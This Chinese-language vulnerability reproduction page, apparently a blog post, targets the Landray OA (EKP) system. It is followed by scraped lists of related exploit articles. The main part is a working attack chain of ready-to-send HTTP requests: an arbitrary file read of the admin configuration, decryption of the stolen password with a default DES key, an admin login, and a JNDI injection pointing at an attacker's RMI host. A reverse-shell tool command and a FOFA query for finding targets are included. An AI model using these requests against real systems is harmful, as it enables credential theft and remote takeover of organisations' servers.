漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

FOFA

app=“Landray-OA系统”

漏洞复现

利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件
/WEB-INF/KmssConfig/admin.properties
发送请求包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey

访问后台地址
http://xxx.xxx.xxx.xxx/admin.do

使用解密到的密码登陆

使用工具反弹shell
https://github.com/feihong-cs/JNDIExploit/tags
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i [address]

运行工具监听端口->ping dnslog测试

POST /admin.do HTTP/1.1
Host:
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin: https://X.X.X.X
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/dnslog


蓝凌OA SSRF+JNDI远程命令执行相关推荐

  1. 蓝海卓越计费管理系统 debug.php 远程命令执行漏洞

    漏洞描述 i ⭐蓝海卓越计费管理系统 debug.php 存在命令调试页面,导致攻击者可以远程命令执行 漏洞影响 s ✅蓝海卓越计费管理系统 空间测绘 d ⭕Hunter:web.title=&quo ...

  2. FastJson远程命令执行漏洞

    FastJson远程命令执行漏洞学习笔记 Fastjson简介 fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean.fastjson.ja ...

  3. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  4. X友 NC 远程命令执行

    X友 NC 远程命令执行 一.漏洞简介 用友NC是一款企业级管理软件,在大中型企业广泛使用.实现建模.开发.继承.运行.管理一体化的IT解决方案信息化平台. 用友NC存在反序列化漏洞,攻击者通过构造特 ...

  5. buuctf刷题9 (反序列化逃逸shtml-SSI远程命令执行idna与utf-8编码漏洞)

    目录 安洵杯2019 easy_serialize_php (反序列化中的对象逃逸) [0CTF 2016]piapiapia(反序列化逃逸) [BJDCTF2020]EasySearch(Apach ...

  6. Fastjson远程命令执行漏洞总结

    1.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符 ...

  7. ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...

    我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...

  8. exim远程命令执行漏洞分析(cve-2019-10149)

    0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...

  9. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  10. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

最新文章

  1. 京东某员工吐槽995:每天晚上的人生,被莫名其妙砍掉2个小时
  2. Deep Web 爬虫体系结构
  3. vue-loader 源码分析
  4. 网站品牌词指数提升的四大方法
  5. jedis操作redis(一)
  6. python爬虫,爬取猫眼电影2(xpath和bs4)
  7. Spring Cloud 搭建 Hystrix Dashboard和Turbine
  8. Java课程作业02
  9. letecode [160] - Intersection of Two Linked Lists
  10. Office2010-2016官方镜像大全
  11. 小米12 Ultra外观设计曝光:白色陶瓷机身 后置硕大相机模组
  12. 给定奇数、横、竖、斜、总和相等python_第四章练习
  13. CI框架SESSION使用
  14. Hook技术(1):Hook技术简介
  15. 软件开发中如何评估工作量
  16. ubuntu死机咋办_Ubuntu16.04死机解决方案
  17. WIN10进不了BIOS的解决办法
  18. win11触控板用不了怎么办?win11触控板用不了的解决方法
  19. (四)Android仿微信—仿QQ登陆
  20. 抢票原理通俗解释,​候补购票是什么?你还在交智商税吗?

热门文章

  1. 三星Q990B全景声回音壁评测
  2. 全球及中国婴儿奶瓶架行业发展趋势预测及投资前景展望报告2022-2028年
  3. 《上古卷轴5:天际》控制台代码之装备
  4. 【转】[DirectShow] 033 - Using Windowed Mode
  5. office 安装出现安装30088-4(5)错误解决方案
  6. 修复计算机系统还原,怎么给电脑系统做一键恢复
  7. php expecting,php – 解析错误:语法错误,意外的’.’,expecting’,’或’;’
  8. 微信小程序分享功能知识点
  9. 基于SpringBoot的毕业设计题目
  10. 大陆资金港股打新股亲身体验全流程